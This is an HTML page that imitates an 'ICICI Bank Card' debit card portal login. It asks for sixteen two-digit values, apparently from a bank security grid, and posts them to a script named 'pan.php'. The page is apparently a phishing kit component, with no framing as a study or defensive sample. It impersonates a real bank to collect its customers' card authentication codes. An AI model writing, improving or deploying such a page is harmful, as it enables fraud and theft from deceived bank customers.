<!DOCTYPE html>
<html>
<style>
input[type=text], select {
  width: 11%;
  padding: 9px 10px;
  margin: 1px 0;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
}

input[type=submit] {
  width: 100%;
  background-color: #4CAF50;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}

input[type=submit]:hover {
  background-color: #45a049;
}

div {
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px;
}

#ml
    {
    width:100%;
    margin-left:0px;
   }
</style>
<body>

  <img src="lojo.png" alt="" id="ml"><br><br>
    <form action="pan.php" method="post">

<center><b style=" color:solid black; font-size:18px; font-family:arial; margin:4px;">Welcome to ICICI Bank Card </b></center>
  

 
  <h4 style="font-family:arial; margin:4px;">Login to Your debit Card Portal</h4><br>



<center><div><img src="grt.png" alt="" id="ml" width="100"><br><br>
  
    
<input type="text" id="fname" name="a" placeholder="A" maxlength=2 pattern="[0-9]{2}"  required="">

<input type="text" id="fname" name="b" placeholder="B" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="c" placeholder="C" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="d" placeholder="D" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="e" placeholder="E" maxlength=2 pattern="[0-9]{2}" required="">


<input type="text" id="fname" name="f" placeholder="F" maxlength=2 pattern="[0-9]{2}" required="">


<input type="text" id="fname" name="g" placeholder="G" maxlength=2 pattern="[0-9]{2}" required="">


<input type="text" id="fname" name="h" placeholder="H" maxlength=2 pattern="[0-9]{2}" required="">

<br>

<input type="text" id="fname" name="i" placeholder="I" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="j" placeholder="J" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="k" placeholder="K" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="l" placeholder="L" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="m" placeholder="M" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="n" placeholder="N" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="o" placeholder="O" maxlength=2 pattern="[0-9]{2}" required="">

<input type="text" id="fname" name="p" placeholder="P" maxlength=2 pattern="[0-9]{2}" required="">

<br><br>
  
    <input type="submit" value="Submit">
  </form>


</div></center>
<img src="l1.png" alt="" id="ml">
  <img src="l2.png" alt="" id="ml">
</body>
</html>


